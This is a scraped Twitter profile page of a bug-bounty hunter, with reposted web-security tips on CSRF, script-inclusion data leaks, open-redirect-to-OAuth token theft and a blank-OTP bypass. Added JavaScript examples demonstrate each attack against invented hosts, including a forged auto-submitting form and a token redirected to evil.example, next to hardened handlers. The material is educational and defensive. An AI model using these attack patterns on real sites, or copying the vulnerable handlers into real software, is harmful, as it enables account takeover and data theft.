Rafin Rahman Chy (@rafinrahmanchy)'s Twitter Profile
Rafin Rahman Chy

@rafinrahmanchy

ID: 3016285670

Joined: 10-02-2015 09:24:02

1.1K Tweets

489 Followers

982 Following

NullSecX (@nullsecurityx)

🧠 CSRF → Silent Action Execution
1️⃣ Victim is logged in
2️⃣ Attacker crafts hidden form auto-submitting to target site
3️⃣ Browser sends cookies automatically
4️⃣ Action (e.g. change email/password) executes without user intent
🎯 No token? No protection.
#bugbounty #csrf
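Worked example of the four steps above, added here and not part of NullSecX's post: the attacker's auto-submitting form, the request the victim's browser ends up sending, and a server handler that accepts it beside one that refuses it. bank.example, evil.example, the session id and the token value are all invented.

```javascript
// Added example, not code from the post. bank.example, evil.example, the
// session id and the token are invented.

// ---- Attacker side: the page the logged-in victim is lured onto ------------
// A form targeting the bank, submitted by script as soon as the page loads.
function buildCsrfPage(action, fields) {
  const esc = (s) => String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;')
                              .replace(/</g, '&lt;').replace(/>/g, '&gt;');
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join('\n    ');
  return `<html><body>
  <form id="f" method="POST" action="${esc(action)}">
    ${inputs}
  </form>
  <script>document.getElementById('f').submit()</script>
</body></html>`;
}

// What the victim's browser sends when that page loads: the bank's cookie is
// attached automatically, Origin names the attacker's site, and there is no
// csrf_token because the attacker's page cannot read one (same-origin policy).
function forgedRequest() {
  return { headers: { origin: 'https://evil.example' },
           cookies: { sid: 'sid-victim' },
           body: { email: 'attacker@evil.example' } };
}

// The same action submitted from the bank's own settings page.
function legitimateRequest() {
  return { headers: { origin: 'https://bank.example' },
           cookies: { sid: 'sid-victim' },
           body: { email: 'alice.new@example.com', csrf_token: 'tok-0123456789abcdef' } };
}

// ---- Server side -----------------------------------------------------------
// Session store keyed by cookie value. The token is minted at login and echoed
// into the site's own forms. A fresh copy per call keeps runs independent.
function makeSessions() {
  return { 'sid-victim': { user: 'alice', email: 'alice@example.com',
                           csrfToken: 'tok-0123456789abcdef' } };
}
const TRUSTED_ORIGINS = new Set(['https://bank.example']);

// Vulnerable: the cookie is the only evidence of intent, and the forged
// request carries it.
function changeEmailVulnerable(req, sessions) {
  const sess = sessions[req.cookies.sid];
  if (!sess) return { status: 401 };
  sess.email = req.body.email;
  return { status: 200, email: sess.email };
}

function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Hardened: the synchronizer token is mandatory, and when the browser sends an
// Origin (or Referer) header it must name our own site. The header check is
// cheap defence in depth; the token is what stops clients that strip both.
function changeEmailHardened(req, sessions) {
  const sess = sessions[req.cookies.sid];
  if (!sess) return { status: 401 };
  let origin = req.headers.origin;
  if (!origin && req.headers.referer) {
    try { origin = new URL(req.headers.referer).origin; } catch { origin = 'invalid'; }
  }
  if (origin && !TRUSTED_ORIGINS.has(origin)) return { status: 403, reason: 'bad origin' };
  if (!constantTimeEqual(req.body.csrf_token, sess.csrfToken)) return { status: 403, reason: 'bad token' };
  sess.email = req.body.email;
  return { status: 200, email: sess.email };
}
```

Chromium treats a cookie that sets no SameSite attribute as Lax, which withholds it from the cross-site POST above, but that default carries a two-minute exception for freshly set cookies and other browsers do not all apply it, so the per-session token remains the primary control and SameSite is a second layer.
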
Rafin Rahman Chy (@rafinrahmanchy)

Hey Grok, based on your analysis of the last 365 days, list in sequence 10 accounts that frequently visit my profile. Do not mention the person, only @.username and the rate of visits to the profile per month

Márcio Souza (@mrccrqr)

Yay, I was awarded a $2,500 bounty on HackerOne! hackerone.com/m4rc10sz

Look for dynamically generated JS embedding sensitive user info in global scope. If session cookies go cross-site, you can load it via <script src> and exfil data - SOP doesn't apply to script inclusion
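An added example of the pattern the post describes, not the report's own code or target: an endpoint that renders the caller's profile as a script setting a global, what an attacker's page learns by including it, and the response shape that cannot be executed at all. victim.example and the profile record are constructed; `new Function` stands in for the browser's script engine.

```javascript
// Added example, not the report's code. victim.example and the profile are
// constructed; `new Function` plays the part of the browser's script engine.

const sampleProfile = { user: 'alice', email: 'alice@example.com', apiKey: 'ak_live_0000' };
const XSSI_PREFIX = ")]}'\n";

// Vulnerable: GET /api/me.js renders the caller's data as JavaScript that
// assigns a global. The site's own pages read window.currentUser, and so can
// any page that does <script src="https://victim.example/api/me.js"></script>
// while the victim's session cookie is attached to that cross-site load.
function profileScriptVulnerable(user) {
  return { contentType: 'application/javascript', headers: {},
           body: `var currentUser = ${JSON.stringify(user)};` };
}

// Hardened: data only, as JSON, behind a prefix that is a JavaScript syntax
// error; nosniff so a <script> tag refuses the non-JS MIME type; CORP so the
// no-cors cross-origin load is blocked before the body is handed over.
function profileJsonHardened(user) {
  return { contentType: 'application/json',
           headers: { 'X-Content-Type-Options': 'nosniff',
                      'Cross-Origin-Resource-Policy': 'same-origin' },
           body: XSSI_PREFIX + JSON.stringify(user) };
}

// The site's own client, fetching with credentials, strips the prefix first.
function parseProtectedJson(body) {
  if (!body.startsWith(XSSI_PREFIX)) throw new Error('missing anti-XSSI prefix');
  return JSON.parse(body.slice(XSSI_PREFIX.length));
}

// Attacker's page: load the response as a script, then read the global.
// Returns what the attacker learns.
function scriptInclusionLeak(response) {
  try {
    const run = new Function(
      response.body + '\n;return typeof currentUser === "undefined" ? undefined : currentUser;');
    const data = run();
    return { leaked: data !== undefined, data };
  } catch (e) {
    return { leaked: false, error: e.name };  // SyntaxError: nothing executed
  }
}
```

The precondition is the cookie crossing sites: a session cookie that is SameSite=Lax (Chromium's default for cookies that set nothing) is not attached to a cross-site <script src>, so the attacker only gets the anonymous version of the endpoint. nosniff makes the browser refuse to run a non-JavaScript MIME type as a script, and CORP: same-origin blocks the no-cors load outright; the prefix is the defence that still holds when a proxy strips either header.
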
Erick Fernando (@erickfernandox)

A simple open redirect can wreak havoc.

Simple open redirect -> misconfigured OAuth authentication flow -> privilege abuse using Amazon Cognito token

#bugbounty #bugcrowd
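An added example of the chain named above, not the author's writeup (whose target and details are not on this page): how an open redirect on an allow-listed host turns a loose redirect_uri check into token theft. app.example, evil.example and the token are invented; the flow is implicit-style with the token in the fragment (response_type=token, which Cognito's hosted UI offers), but the same chain works for an authorization code in the query string.

```javascript
// Added example, not the author's report. app.example, evil.example and the
// token value are invented.

const REGISTERED_REDIRECTS = ['https://app.example/callback'];

// Weak check #1: prefix match. Anything appended survives, including ?next=.
function redirectAllowedByPrefix(uri) {
  return REGISTERED_REDIRECTS.some((r) => uri.startsWith(r));
}

// Weak check #2: hostname suffix. 'evil-app.example' ends with 'app.example'.
function redirectAllowedByHostSuffix(uri) {
  try { return new URL(uri).hostname.endsWith('app.example'); } catch { return false; }
}

// Strict: exact string comparison against the registered value, which is what
// RFC 6749 section 3.1.2.3 asks for.
function redirectAllowedExact(uri) {
  return REGISTERED_REDIRECTS.includes(uri);
}

// Simulated authorization endpoint: validate redirect_uri, then 302 to it with
// the token in the fragment.
function authorize(redirectUri, validator) {
  if (!validator(redirectUri)) return { status: 400, error: 'invalid_request' };
  return { status: 302, location: `${redirectUri}#access_token=eyJ.victim.token&token_type=Bearer` };
}

// The app's open redirect: GET /callback?next=<url> answers 302 <url>. Browsers
// carry the fragment of the current URL onto a Location that has none, so the
// token follows the victim to <url>.
function followAppRedirect(location) {
  const u = new URL(location);
  const next = u.pathname === '/callback' ? u.searchParams.get('next') : null;
  if (!next) return u.toString();
  const dest = new URL(next);
  if (!dest.hash) dest.hash = u.hash;
  return dest.toString();
}

// Full chain: the attacker sends the victim to the authorization endpoint with
// this redirect_uri. Returns the URL the token ends up on, or null if refused.
function tokenLandsOn(validator) {
  const crafted = 'https://app.example/callback?next=https://evil.example/collect';
  const res = authorize(crafted, validator);
  if (res.status !== 302) return null;
  return new URL(followAppRedirect(res.location));
}
```

The state parameter and PKCE do not help here: both protect against a token or code being injected into the victim's session, not against the server delivering the victim's own token to a redirect_uri the attacker chose. Fixing the open redirect removes this chain, but exact-match validation removes the whole class.
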
Gospel.C (@40sp3l)

Day 13 (cont'd) - Bug Bounty (Going Solo) - Discovered a broken authentication that led to account takeover. This could be a low-medium because I have to meet certain requirements to prove exploitability, which I was able to; that was what actually downgraded the CVSS.

Sayaan Alam (@ehsayaan)

Found a very simple yet weird OTP bypass issue recently:

Tried a normal flow:

- Wrong OTP → rejected (expected behavior)

- Blank value in OTP param → surprisingly accepted, allowing me to change account details without the correct OTP.

So the server was verifying OTPs, but
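An added example, not the reporter's target code: the one-line mistake that makes a blank OTP pass, beside a check that treats absence, empty string, wrong type, reuse, expiry and brute force as failures. The stored code 493021, the five-attempt cap and the timestamps are invented.

```javascript
// Added example, not the target's code. The stored code, attempt cap and
// timestamps are invented.

// Vulnerable: verification only runs when a value was supplied. Absent, empty
// and null all skip the comparison, which is what the post observed: a wrong
// code is rejected, a blank one is accepted.
function verifyOtpVulnerable(submitted, stored) {
  if (submitted) {
    if (submitted !== stored.code) return { ok: false, reason: 'wrong code' };
  }
  return { ok: true };
}

// Hardened: the value must be a six-digit string, the record unexpired and
// unused, every attempt is counted before comparing, and success burns the
// code. With the attempt cap in place a timing side channel on the equality
// test has no room to work, so plain === is acceptable here.
const MAX_ATTEMPTS = 5;
function verifyOtpHardened(submitted, stored, now = Date.now()) {
  if (stored.used) return { ok: false, reason: 'already used' };
  if (now > stored.expiresAt) return { ok: false, reason: 'expired' };
  if (stored.attempts >= MAX_ATTEMPTS) return { ok: false, reason: 'locked' };
  stored.attempts += 1;
  if (typeof submitted !== 'string' || !/^[0-9]{6}$/.test(submitted)) {
    return { ok: false, reason: 'malformed' };
  }
  if (submitted !== stored.code) return { ok: false, reason: 'wrong code' };
  stored.used = true;
  return { ok: true };
}

// A freshly issued OTP record, valid for five minutes.
function makeOtpRecord(now = Date.now()) {
  return { code: '493021', expiresAt: now + 5 * 60 * 1000, attempts: 0, used: false };
}
```

The vulnerable branch usually comes from an `if (otp)` guard written to support an optional second factor, or from a framework validator that only runs when the field is non-empty; the fix is to require the field whenever the flow demands it and to fail closed on any value that is not exactly the expected shape.
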
YesWeHack ⠵ (@yeswehack)

Want to hack mobile applications? 📱 We’ve just published the ultimate guide to building an Android #BugBounty lab with emulators, real devices and proxies (featuring Genymotion, Android emulator, Magisk, Burp, Frida & Medusa) 👇 #BugBountyTips yeswehack.com/learn-bug-boun…

November Rain (@xchopath)

3rd Account Takeover finding for this month (after investing almost 2 months understanding the app without any finding).

Allah's plan is always the best!

Alhamdulillah.

If you guys wanna be friends or just ask something, feel free to hit me up!
black viru5 (@yazeed_oliwah)

I published my website and my first blog🔥 Website: blackvirus.pages.dev Bug Bounty Methodology Part 1: blackvirus-blog.pages.dev/web-security-b… enjoy😁 #BugBounty #bugbountytips #Cybersecurity #Hacking

Behi (@behi_sec)

Bug Bounty Lesson: Don’t treat a target as pages. Treat it as a collection of flows. Login → reset password → change email → delete account. Each step has params. Each param is a chance for bugs. Flows reveal more than single endpoints.

bugcrowd (@bugcrowd)

Attackers don’t always break the door down. Sometimes they just walk in and make themselves at home. 🏡

Broken authentication and weak session management let attackers impersonate real users without raising alarms. 🤨

Here’s what you need to know: bugcrowd.com/blog/when-atta…
🇸🇦 ROOD | GOAT (@0x_rood)

What happened here?

1. I found a subdomain endpoint via DuckDuckGo dorking.
2. I noticed a login endpoint that’s different from the users endpoint (neither allows registration).
3. I fuzzed that endpoint and discovered a user-management endpoint, but the website redirected me, so I
Pavan (@eh_pavan)

I published a Bug Bounty Playbook to help the community quickly test bypasses and move past roadblocks. It includes OWASP Top 10 examples + extra vuln types. Techniques limited for now — more coming. Repo: github.com/ehpavan/Pavan-… #BugBounty #bugbountytips #Hacking #CyberSecurity

Mayank Vora (@aiwithmayank)

🚨 Prompt engineering is officially outdated.

Anthropic just released the real playbook for building AI agents that actually work.

It’s a 30+ page deep dive called The Complete Guide to Building Skills for Claude and it quietly shifts the conversation from “prompt engineering”